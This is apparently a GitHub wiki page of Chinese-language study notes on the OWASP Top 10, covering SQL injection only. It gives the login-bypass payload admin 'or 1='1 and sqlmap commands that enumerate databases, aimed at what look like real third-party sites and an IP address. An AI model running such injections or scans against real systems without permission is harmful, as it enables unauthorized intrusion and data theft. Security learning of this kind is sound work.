OWASP TOP 10 - daniel-qa/Information-Security GitHub Wiki
OWASP TOP 10
OWASP 的全名為開放式 web 應用安全專案(Open Web Application Security Project)
1 .SQL Injection
範例 #
admin 'or 1='1
即使密碼隨便輸入,也能登入至系統中
- 工具 sqlmap
- Demo
python sqlmap.py -u "https://ies5-rc.teammodel.net/login/student" --batch --banner
-b, --banner 獲取數據庫管理系統的標識
需要 api url 有參數,ex: id=1,才能進行檢測
入門
- 1、判断是否有post注入?
sqlmap -u http://vip.fj0730.cn/login.asp --forms
順利的話,可以得到哪種資料庫
比如数据库是:Microsoft SQL Server,也就是mssql;
- 2、查找数据库
sqlmap -u http://vip.fj0730.cn/login.asp --forms --dbs
查找当前的数据库
sqlmap -u http://vip.fj0730.cn/login.asp --forms --current-db
检测注入点是否可用
输入python sqlmap.py -u “[http://219.153.49.228:46548/new_list.php?id=1”](http://219.153.49.228:46548/new_list.php?id=1%E2%80%9D) --current-db
这里引号内是需要注入的网址,“–current-db”则是获取数据库名
- 由 chrome 中的 payload ,找出 post 的參數
id: "123", pw: "444"
如何執行sqlmap?
如果您在 UNIX/Linux 系統上運行,請從終端鍵入以下命令:
python sqlmap.py -h
您還可以看到詳細的幫助消息鍵入:
python sqlmap.py -hh
如果您在 Windows 系統上運行,請從終端鍵入以下命令:
C:\PythonXX\python.exe sqlmap.py -h